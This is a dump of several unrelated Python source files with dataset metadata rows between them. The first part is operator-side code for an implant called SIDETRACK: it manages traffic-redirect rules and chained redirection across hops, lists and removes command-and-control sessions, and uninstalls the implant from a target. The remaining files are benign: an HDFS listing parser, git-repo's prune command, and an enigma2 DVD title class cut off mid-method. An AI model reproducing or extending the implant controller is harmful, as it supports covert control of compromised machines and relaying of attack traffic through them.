            return (0, "Implant did not return a valid response")
    def listAll(self):
        """Walk all rules; the implant returns ret==1 while more remain."""
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            # Pass the last-seen rule number back as the cursor.
            self.data = struct.pack("!LL",0,self.rule)
            self.Query()
            if self.op == 0x24L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        # ret == 2 signals an empty rule table.
        if self.ret == 2:
            return (1, "No rules to list")
        else:
            return (1, out)
    def run(self,rule=None):
        """Entry point: list one rule, or all rules when none is given."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        if rule == None:
            res = self.listAll()
        else:
            res = self.listOne(rule)
        return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
    """Implant command: activate/deactivate redirect rules (opcode 0x25)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirset"
        self.usage = "redirset <rule|all> <active|inactive>"
        self.info = "Set a redirect rule as being active or inactive."
        self.op = 0x25L
    def run(self, rule, status):
        """Set one rule (or all rules, rule==0) to the given status.

        status: a string starting with 'a'/'A' (active) or 'i'/'I'
        (inactive); rule may be a number or the string 'all'.
        """
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        # 'all' (any string beginning with A) maps to rule number 0.
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        if string.upper(status[:1]) == 'A':
            status = 1
        elif string.upper(status[:1]) == 'I':
            status = 0
        i=0
        # Delegate to the locally tracked REDIRECT objects, which also
        # propagate the change along any chained rules.
        while i < len(self.implant.rules):
            if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
                res = self.implant.rules[i].set(status)
                if res[0] == 0:
                    return res
            elif rule != 0:
                break
            i = i + 1
        # NOTE(review): res is unbound here if the loop body never ran —
        # base.db would raise in that case; left as-is.
        base.db(3,res[1])
        if i == len(self.implant.rules) and rule != 0:
            return (0, "Rule does not exist")
        else:
            return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
    """Implant command: remove connection entries (opcode 0x28)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connrm"
        self.usage = "connrm <rule|all>"
        self.info = "Remove a connection entry (or all connection entries)"
        self.op = 0x28L
    def run(self, rule):
        """Remove the numbered connection, or all of them ('all' -> 0)."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        # 'all' (any string beginning with A) maps to rule number 0.
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        self.data = struct.pack("!L",rule)
        self.Query()
        if self.op == 0x28L and self.res == 0x1L:
            return (1, "Connection(s) removed successfully")
        else:
            return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
    """Implant command: list tracked connections (opcode 0x27).

    Can list all connections, a single connection by number (-c), or
    all connections belonging to one redirect rule (-r).
    """
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connlist"
        self.usage = "connlist [-c <rule> | -r <redir>]"
        self.info = "Lists a (or all) connection rules"
        self.op = 0x27L
    def convertState(self,state):
        """Map a numeric TCP tracking state to its display name."""
        if state == 0:
            return "INIT"
        elif state == 1:
            return "SYN_SENT"
        elif state == 2:
            return "SYN_RCVD"
        elif state == 3:
            return "SYN_ACK_RCVD"
        elif state == 4:
            return "SYN_ACK_SENT"
        elif state == 5:
            return "ESTABLISHED"
        elif state == 6:
            return "FIN_SENT"
    def parseReturn(self):
        """Decode one connection record from the raw reply in self.data.

        One-byte fields are widened to 16 bits by prepending a NUL
        before struct.unpack.
        """
        self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
        self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
        sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
        recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
        sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
        self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
            self.STip, self.Aport, self.SAport, self.Tport, self.STport \
            = struct.unpack("!LLLLLLLHHHH",self.data[20:56])
        self.leftState = ''
        self.rightState = ''
        if self.protocol == 6:
            self.protocol = "TCP"
            # 'sender' selects which side's state belongs on which end of
            # the printed A<->T line.
            if sender == 1:
                self.leftState = self.convertState(sendstate)
                self.rightState = self.convertState(recvstate)
            else:
                self.leftState = self.convertState(recvstate)
                self.rightState = self.convertState(sendstate)
        elif self.protocol == 17:
            self.protocol = "UDP"
        else:
            self.protocol = '%d' %(self.protocol)
    def outputCurrent(self):
        """Render the most recently parsed connection as a summary block."""
        res = '%d %s Redir rule: %d Last seen: %s\n   %s:%d <-%s(%d)-> %s:%d\n   %s:%d <-%s(%d)-> %s:%d\n' % \
              (self.rule,self.protocol,self.redir,
               time.ctime(self.last+self.implant.timediff)[4:],
               self.ConvertToDot(self.Aip),self.Aport,
               self.leftState,self.at_cnt,
               self.ConvertToDot(self.SAip),self.SAport,
               self.ConvertToDot(self.STip),self.STport,
               self.rightState,self.ta_cnt,
               self.ConvertToDot(self.Tip),self.Tport)
        return (1,res)
    def listAll(self,redir):
        """Walk all connections (optionally filtered to one redirect rule)."""
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            # Pass the last-seen connection number back as the cursor.
            self.data = struct.pack("!LLL",0,self.rule,redir)
            self.Query()
            if self.op == 0x27L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        # ret == 2 signals an empty connection table.
        if self.ret == 2:
            return (1,"No connections to list")
        else:
            return (1,out)
    def listOne(self,rule):
        """Query and format a single connection by number."""
        self.data = struct.pack("!LLL",rule,0,0)
        self.Query()
        if self.op == 0x27L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
            return (0, "Implant did not return a valid response")
    def run(self, option=None, value=None):
        """Entry point: dispatch on -c (one connection) / -r (one rule)."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        rule = 0
        redir = 0
        if option != None:
            if option == '-c':
                rule = value
            elif option == '-r':
                redir = value
            else:
                raise TypeError, option
        if rule == 0:
            res = self.listAll(redir)
        else:
            res = self.listOne(rule)
        return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
    """Implant command: remove redirect rules (opcode 0x26)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirrm"
        self.usage = "redirrm <rule|all>"
        self.info = "Remove a redirect rule (or all redirect rules)"
        self.op = 0x26L
    def run(self, rule):
        """Remove the numbered rule, or all rules ('all' -> 0).

        Locally tracked REDIRECT objects are removed first (which also
        tears down chained rules); any remaining remote-only rule is
        removed with a direct query.
        """
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        removed = 0
        # 'all' (any string beginning with A) maps to rule number 0.
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        i = 0
        while i < len(self.implant.rules):
            if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
                res = self.implant.rules[i].remove()
                if res[0] == 0:
                    return res
                removed = 1
                # remove() deletes the entry from implant.rules, so step
                # back to avoid skipping the element that shifted down.
                i = i - 1
            i = i + 1
        if removed == 0 or rule == 0:
            self.data = struct.pack("!L",rule)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                return (1, "Rule(s) removed successfully")
            else:
                return (0, "Error removing rule(s)")
        else:
            return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
    """Implant command: list command-and-control sessions (opcode 0x29)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "cclist"
        self.usage = "cclist"
        self.info = "List all of the command and control sessions"
        self.op = 0x29L
    def parseReturn(self):
        """Decode one CC-session record from the raw reply in self.data."""
        self.more,self.rule,self.longevity,self.srcip,self.dstip,\
            self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
        # Bit 0x2 of 'more' marks the session this operator is using.
        if self.more & 2L:
            self.current = "(CURRENT) "
        else:
            self.current = ""
        self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
        self.srcip = self.ConvertToDot(self.srcip)
        self.dstip = self.ConvertToDot(self.dstip)
    def displayCurrent(self):
        """Render the most recently parsed session as one line."""
        # STUB: Make this better!
        # 0xffffffff appears to be a sentinel meaning "no entry" —
        # nothing is printed for it.
        if self.rule == 0xffffffffL:
            return ""
        res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
              (self.rule,self.current,self.srcip,self.srcport,\
               self.dstip,self.dstport,self.longevity)
        return res
    def run(self):
        """Walk all CC sessions; bit 0x1 of 'more' means more remain."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        res = ""
        last = 0L
        self.more = 1
        while self.more & 1L:
            self.data = struct.pack("!L",last)
            self.Query()
            if self.op == 0x29L and self.res == 0x1L:
                self.parseReturn()
                # Prepend, so the final listing is in reverse query order.
                res = self.displayCurrent() + res
                last = self.rule
            else:
                return (0, "Error getting CC rules")
        return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
    """Implant command: remove a command-and-control session (opcode 0x2a)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "ccremove"
        self.usage = "ccremove <rule>"
        self.info = "Remove a command and control session (see also: done)"
        self.op = 0x2aL
    def run(self,rule):
        """Remove the numbered CC session (the current one cannot be removed)."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        self.data = struct.pack("!L",rule)
        self.Query()
        if self.op == 0x2aL and self.res == 0x1L:
            return (1, "Session removed successfully")
        else:
            return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
    """Implant command: uninstall SIDETRACK from the target (opcode 0x30)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "stunload"
        self.usage = "stunload <magic>"
        self.info = "Remove SIDETRACK from the target"
        self.op = 0x30L
    def run(self, magic):
        """Send the unload request; 'magic' is presumably a confirmation
        value required by the implant — TODO confirm."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        self.data = struct.pack("!L",magic);
        self.Query()
        if self.op == 0x30L and self.res == 0x1L:
            return (1, "SIDETRACK successfully removed from target")
        else:
            return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
    """One redirect rule: the pairing of a remote (implant-side) rule and
    a matching local rule.

    Rules can be chained across hops via self.prev/self.next; remove()
    and set() propagate along the chain in both directions.
    """
    def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
                 A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
                 A_port, SA_port, T_port, ST_port):
        SIDECMD.__init__(self)
        # Borrow transport/session state from the command that created us.
        self.protocol = cmd.protocol
        self.implant = cmd.implant
        self.session = cmd.implant.session
        self.target = cmd.implant.session.target
        self.longevity = longevity
        self.nextRule = next
        self.connection_timeout = connection_timeout
        self.proto = protocol
        self.A_ip = A_ip
        self.T_ip = T_ip
        self.ident = ident
        self.seq = seq
        self.munge = munge
        self.crypto_key = crypto_key
        self.ttl_mod = ttl_mod
        self.flags = flags
        self.A_port = A_port
        self.SA_port = SA_port
        self.T_port = T_port
        self.ST_port = ST_port
        # Bookkeeping for add()/remove(): rule numbers on each side and
        # the chain links to rules on other hops.
        self.added = 0
        self.localRuleNum = None
        self.remoteRuleNum = None
        self.prev = None
        self.next = None
        self.ccPassthru = None
    def remove(self,direction=0):
        """Remove this rule and propagate removal along the chain.

        direction: 0 = both ways, 1 = toward prev only, 2 = toward next
        only (used to avoid walking back the way we came).
        """
        if self.added == 0:
            return (0, "Rule does not exist")
        # Tear down any CC passthrough session riding on this rule first.
        if self.ccPassthru != None:
            cmd = self.ccPassthru.GetCommand('done')
            cmd.run()
        if direction != 1 and self.next != None:
            res = self.next.remove(2)
            if res[0] == 0:
                return (res[0], "Rule could not be removed: " + res[1])
            self.next = None
        if self.remoteRuleNum != None:
            # Remove the remote rule via opcode 0x26, then the local one.
            self.op = 0x26L
            self.data = struct.pack("!L",self.remoteRuleNum)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                base.redir.delete(self.localRuleNum)
                self.added = 0
                self.localRuleNum = None
                self.implant.rules.remove(self)
                if direction != 2 and self.prev != None:
                    res = self.prev.remove(1)
                    if res[0] == 0:
                        return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d removed"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be removed")
        else:
            # Local-only rule: nothing to tell the implant.
            base.redir.delete(self.localRuleNum)
            return (1, "Local rule removed")
    def set(self,value,direction=0):
        """Set this rule active (1) / inactive (0), propagating along the
        chain; direction has the same meaning as in remove()."""
        if self.added == 0:
            return (0, "Rule does not exist")
        if direction != 1 and self.next != None:
            res = self.next.set(value,2)
            if res[0] == 0:
                return(res[0], "Rule could not be set: " + res[1])
        if self.remoteRuleNum:
            # Update the remote rule via opcode 0x25, then mirror locally.
            self.op = 0x25L
            self.data = struct.pack("!LH",self.remoteRuleNum, value)
            self.Query()
            if self.op == 0x25L and self.res == 0x1L:
                base.redir.set(self.localRuleNum, value)
                if direction != 2 and self.prev != None:
                    res = self.prev.set(value,1)
                    if res[0] == 0:
                        return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d set"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be set")
        else:
            base.redir.set(self.localRuleNum, value)
            return (1, "Local rule set")
    def add(self, addremote=1):
        """Install the rule: remotely (opcode 0x23) and/or locally.

        Returns (ruleNum-or-0, message, AT_ip); AT_ip is the implant's
        reported address for the A->T side (0 when unknown). On local
        failure the freshly added remote rule is rolled back.
        """
        if self.added == 1:
            return (0, "Rule already exists", 0)
        AT_ip = 0
        if addremote:
            self.op = 0x23L
            self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
                                    self.connection_timeout)
            self.data = self.data + self.A_ip + self.T_ip
            self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
                          (self.ttl_mod << 8 | self.proto), self.munge,\
                          self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
                          self.crypto_key[3], self.ident, 0, self.A_port, \
                          self.SA_port, self.T_port, self.ST_port, self.seq)
            self.Query()
            if self.op == 0x23L and self.res == 0x01L:
                self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
                AT_ip = struct.unpack("!L", self.data[4:8])[0]
                self.ST_ip = self.data[4:8]
                res = base.redir.redir(self.longevity,self.connection_timeout,\
                                       self.ConvertIP(self.target.ip), \
                                       self.T_ip,\
                                       self.seq, self.munge, self.crypto_key, \
                                       self.flags, self.A_port, self.SA_port,\
                                       self.ident, self.proto)
                if res < 1:
                    # Local add failed: try to roll back the remote rule.
                    self.op = 0x26L
                    self.data = struct.pack("!L",self.remoteRuleNum)
                    self.Query()
                    if self.op == 0x26L and self.res == 0x1L:
                        self.remoteRuleNum = None
                        return (0, "Local rule could not be added", AT_ip)
                    else:
                        return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
                self.localRuleNum = res
                self.added = 1
                self.implant.rules.append(self)
                return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
            else:
                return (0, "Remote rule could not be added", AT_ip)
        else:
            # Local-only install.
            self.remoteRuleNum = None
            res = base.redir.redir(self.longevity,self.connection_timeout,\
                                   self.ConvertIP(self.target.ip), \
                                   self.T_ip,\
                                   self.seq, self.munge, self.crypto_key, \
                                   self.flags, self.A_port, self.SA_port,\
                                   self.ident, self.proto)
            if res < 1:
                return (0, "Local rule could not be added", 0)
            self.added = 1
            self.localRuleNum = res
            return (1, "Local rule added", 0)
| unlicense | 5,147,977,936,728,221,000 | 35.501265 | 289 | 0.462023 | false | 3.780741 | false | false | false |
simondolle/hls-autocomplete | hls_autocomplete/parse.py | 1 | 5470 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
    """Metadata for one file or directory, as reported by an HDFS listing.

    Attributes mirror the columns of an `ls -l`-style listing: permission
    string, file count, owner, group, size in bytes, modification date,
    and the (absolute) path plus an optional relative path.
    """

    def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath=None):
        self.path = path
        self.rights = rights      # unix-style permission string, e.g. "drwxr-xr-x"
        self.nbFiles = nbFiles    # file count column (shown only for plain files)
        self.owner = owner
        self.group = group
        self.size = size          # size in bytes
        self.date = date          # modification date/time
        self.relpath = relpath    # path relative to the listed directory, if known

    def __eq__(self, other):
        # NOTE(review): relpath is deliberately excluded from equality,
        # matching the original behavior — confirm this is intended.
        return (self.path == other.path and self.rights == other.rights and
                self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
                self.size == other.size and self.date == other.date)

    def is_dir(self):
        """Return True if the permission string marks a directory."""
        return self.rights.startswith("d")

    def __str__(self):
        return self.to_str(0, 0, 0, 0, 0, 0, 0)

    def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
        """Render one aligned listing line, utf-8 encoded.

        Each *_width gives the column width to left-justify into.
        """
        # BUG FIX: the original tested the bound method itself
        # (`if self.is_dir:`), which is always truthy, so the file count
        # was never displayed. Call the method instead.
        if self.is_dir():
            nb_files = "-"
        else:
            nb_files = str(self.nbFiles)
        result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
                                           nb_files.ljust(nbFiles_width),
                                           self.owner.ljust(owner_width),
                                           self.group.ljust(group_width),
                                           str(self.size).ljust(size_width),
                                           # BUG FIX: %m (month), not %M (minute).
                                           self.date.strftime("%Y-%m-%d %H:%M").ljust(date_width),
                                           self.path.ljust(path_with))
        return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
    """Format a list of FileStatus objects into aligned columns.

    Computes the maximum width of each column across all entries, then
    delegates per-line rendering to FileStatus.to_str. Returns the lines
    joined with newlines ("" for an empty list).
    """
    rights_width = 0
    nb_files_width = 0
    owner_width = 0
    group_width = 0
    size_width = 0
    date_width = 0
    path_width = 0
    if file_statuses:
        rights_width = max(len(fs.rights) for fs in file_statuses)
        nb_files_width = max(len(str(fs.nbFiles)) for fs in file_statuses)
        owner_width = max(len(fs.owner) for fs in file_statuses)
        group_width = max(len(fs.group) for fs in file_statuses)
        size_width = max(len(str(fs.size)) for fs in file_statuses)
        # FIX: %m (month), not %M (minute) — kept consistent with
        # FileStatus.to_str; both render to 16 characters, so widths are
        # unaffected either way.
        date_width = max(len(fs.date.strftime("%Y-%m-%d %H:%M")) for fs in file_statuses)
        path_width = max(len(fs.path) for fs in file_statuses)
    return "\n".join(
        fs.to_str(rights_width, nb_files_width, owner_width, group_width,
                  size_width, date_width, path_width)
        for fs in file_statuses)
class LsParser(object):
    """Parse `hdfs dfs -ls`-style textual output into FileStatus objects."""

    def __init__(self):
        pass

    def parse_line(self, line):
        """Parse one listing line; return a FileStatus or None if it does
        not match the expected format.

        Expected columns: rights, file count, owner, group, size, day,
        month name, year-or-time, absolute path.
        """
        regex = r"^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$"
        m = re.match(regex, line, re.UNICODE)
        if m is None:
            return None
        rights = m.group(1)
        nbFiles = int(m.group(2))
        owner = m.group(3)
        group = m.group(4)
        size = int(m.group(5))
        day = int(m.group(6))
        month = m.group(7)
        try:
            month = strptime(month, '%b').tm_mon
        # FIX: narrowed from a bare except — strptime raises ValueError
        # for unrecognized month abbreviations.
        except ValueError:
            # Fall back to French month abbreviations.
            month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
        try:
            year = int(m.group(8))
        # FIX: narrowed from a bare except — for recent files this column
        # holds an HH:MM time, which int() rejects with ValueError; assume
        # the current year in that case.
        except ValueError:
            year = datetime.datetime.now().year
        filename = m.group(9)
        date = datetime.date(year, month, day)
        return FileStatus(filename, rights, nbFiles, owner, group, size, date)

    def parse(self, output):
        """Parse full listing output; unmatched lines are dropped."""
        result = [self.parse_line(line) for line in output.split("\n")]
        return [p for p in result if p is not None]
class WebHdfsParser(object):
    """Parse WebHDFS LISTSTATUS JSON responses into FileStatus objects.

    path: the directory whose listing is being parsed; entry paths are
    built by joining it with each entry's pathSuffix.
    """
    def __init__(self, path):
        self.path = path
    def permissions_to_unix_name(self, is_dir, rights):
        """Convert an octal permission string (e.g. "755" or "1777") to a
        unix-style display string (e.g. "drwxr-xr-x").

        A 4-digit value starting with '1' is treated as the sticky bit.
        NOTE(review): setuid/setgid prefixes ('2'/'4') are not handled.
        """
        is_dir_prefix = 'd' if is_dir else '-'
        sticky = False
        if len(rights) == 4 and rights[0] == '1':
            sticky = True
            rights = rights[1:]
        dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
        result = is_dir_prefix + ''.join(dic[x] for x in rights)
        if sticky:
            # Sticky bit replaces the final execute flag with 't'.
            result = result[:-1] + "t"
        return result
    def parse_status(self, status):
        """Build a FileStatus from one FileStatus JSON object."""
        relpath = status["pathSuffix"]
        path = os.path.join(self.path, relpath)
        nbFiles = 0
        size = status["length"]
        owner = status["owner"]
        group = status["group"]
        is_dir = status["type"] == "DIRECTORY"
        right_digits = status["permission"]
        rights = self.permissions_to_unix_name(is_dir, right_digits)
        # modificationTime is in milliseconds since the epoch; convert to
        # seconds (integer division under Python 2) before building the
        # timestamp, then drop sub-minute precision.
        parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
        date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
        return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
    def parse(self, output):
        """Parse a LISTSTATUS response body; return [] (after printing the
        offending payload) on malformed input.

        NOTE(review): the bare except and debug prints swallow all JSON
        errors — consider narrowing and logging instead.
        """
        try:
            j = json.loads(output)
        except:
            print output
            return []
        if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
            print j
            return []
        statuses = j["FileStatuses"]["FileStatus"]
        result = []
        for status in statuses:
            result.append(self.parse_status(status))
        return result
| mit | 8,956,800,245,281,798,000 | 33.821656 | 134 | 0.539601 | false | 3.488832 | false | false | false |
lipro-yocto/git-repo | subcmds/prune.py | 1 | 1907 | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from color import Coloring
from command import PagedCommand
class Prune(PagedCommand):
  common = True
  helpSummary = "Prune (delete) already merged topics"
  helpUsage = """
%prog [<project>...]
"""

  def Execute(self, opt, args):
    """Prune merged topic branches and report any that remain pending."""
    # Collect the branches each project could not prune automatically.
    pending = []
    for project in self.GetProjects(args):
      pending.extend(project.PruneHeads())

    if not pending:
      return

    class Report(Coloring):
      def __init__(self, config):
        Coloring.__init__(self, config, 'status')
        self.project = self.printer('header', attr='bold')

    out = Report(pending[0].project.config)
    out.project('Pending Branches')
    out.nl()

    # Emit a project header whenever the owning project changes.
    current = None
    for branch in pending:
      if current != branch.project:
        current = branch.project
        out.nl()
        out.project('project %s/' % current.relpath)
        out.nl()

      marker = '*' if branch.name == current.CurrentBranch else ' '
      print('%s %-33s ' % (marker, branch.name), end='')
      if not branch.base_exists:
        print('(ignoring: tracking branch is gone: %s)' % (branch.base,))
      else:
        commits = branch.commits
        plural = 's' if len(commits) != 1 else ' '
        print('(%2d commit%s, %s)' % (len(commits), plural, branch.date))
| apache-2.0 | -1,370,391,103,459,699,500 | 28.796875 | 74 | 0.633456 | false | 3.940083 | false | false | false |
atvcaptain/enigma2 | lib/python/Plugins/Extensions/DVDBurn/Title.py | 1 | 6455 | from __future__ import absolute_import
from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection
from . import TitleCutter
class ConfigFixedText(ConfigText):
	"""A ConfigText whose value is fixed: all key presses are ignored."""
	def __init__(self, text, visible_width=60):
		ConfigText.__init__(self, default = text, fixed_size = True, visible_width = visible_width)
	def handleKey(self, key):
		# Intentionally a no-op: the text cannot be edited from the UI.
		pass
class Title:
	"""One title (recording) on a DVD being authored.

	Holds the DVB metadata of the source recording, the user-editable
	menu properties, the cut list, and the chapter marks derived from it.
	"""
	def __init__(self, project):
		self.properties = ConfigSubsection()
		self.properties.menutitle = ConfigText(fixed_size = False, visible_width = 80)
		self.properties.menusubtitle = ConfigText(fixed_size = False, visible_width = 80)
		self.properties.aspect = ConfigSelection(choices = [("4:3", _("4:3")), ("16:9", _("16:9"))])
		self.properties.widescreen = ConfigSelection(choices = [("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")])
		# Auto chapter interval in minutes; 0 disables automatic chapters.
		self.properties.autochapter = ConfigInteger(default = 0, limits = (0, 60))
		self.properties.audiotracks = ConfigSubList()
		self.DVBname = _("Title")
		self.DVBdescr = _("Description")
		self.DVBchannel = _("Channel")
		self.cuesheet = [ ]
		self.source = None
		self.filesize = 0
		self.estimatedDiskspace = 0
		self.inputfile = ""
		self.cutlist = [ ]
		self.chaptermarks = [ ]
		self.timeCreate = None
		self.project = project
		self.length = 0
		self.VideoType = -1
		self.VideoPID = -1
		self.framerate = 0
		self.progressive = -1
		self.resolution = (-1, -1)
	def addService(self, service):
		"""Populate this title's metadata from an enigma2 service reference."""
		from os import path
		from enigma import eServiceCenter, iServiceInformation
		from ServiceReference import ServiceReference
		from time import localtime, time
		self.source = service
		serviceHandler = eServiceCenter.getInstance()
		info = serviceHandler.info(service)
		sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or ""
		self.DVBdescr = sDescr
		sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate)
		if sTimeCreate > 1:
			self.timeCreate = localtime(sTimeCreate)
		serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref))
		name = info and info.getName(service) or "Title" + sDescr
		self.DVBname = name
		self.DVBchannel = serviceref.getServiceName()
		self.inputfile = service.getPath()
		self.filesize = path.getsize(self.inputfile)
		self.estimatedDiskspace = self.filesize
		self.length = info.getLength(service)
	def addFile(self, filename):
		"""Add a file by path: wrap it in a service reference and open the
		cutlist editor to let the user trim it."""
		from enigma import eServiceReference
		ref = eServiceReference(1, 0, filename)
		self.addService(ref)
		self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self)
	def titleEditDone(self, cutlist):
		"""Callback from the cutlist editor: store the cuts and derive the
		final cutlist/chapter marks."""
		self.initDVDmenuText(len(self.project.titles))
		self.cuesheet = cutlist
		self.produceFinalCuesheet()
	def initDVDmenuText(self, track):
		"""Fill menu title/subtitle from the project's format templates."""
		s = self.project.menutemplate.settings
		self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track))
		self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track))
	def formatDVDmenuText(self, template, track):
		"""Expand $-tokens in a menu text template.

		Tokens: $i track number, $t name, $d description, $c chapter
		count, $f input file, $C channel, $A audio track list, $l length,
		$Y/$M/$D/$T creation date/time.
		"""
		template = template.replace("$i", str(track))
		template = template.replace("$t", self.DVBname)
		template = template.replace("$d", self.DVBdescr)
		template = template.replace("$c", str(len(self.chaptermarks)+1))
		template = template.replace("$f", self.inputfile)
		template = template.replace("$C", self.DVBchannel)
		#if template.find("$A") >= 0:
		audiolist = [ ]
		for audiotrack in self.properties.audiotracks:
			active = audiotrack.active.getValue()
			if active:
				trackstring = audiotrack.format.getValue()
				trackstring += ' (' + audiotrack.language.getValue() + ')'
				audiolist.append(trackstring)
		audiostring = ', '.join(audiolist)
		template = template.replace("$A", audiostring)
		if template.find("$l") >= 0:
			# Length in seconds -> H:MM:SS (Python 2 integer division).
			l = self.length
			lengthstring = "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
			template = template.replace("$l", lengthstring)
		if self.timeCreate:
			template = template.replace("$Y", str(self.timeCreate[0]))
			template = template.replace("$M", str(self.timeCreate[1]))
			template = template.replace("$D", str(self.timeCreate[2]))
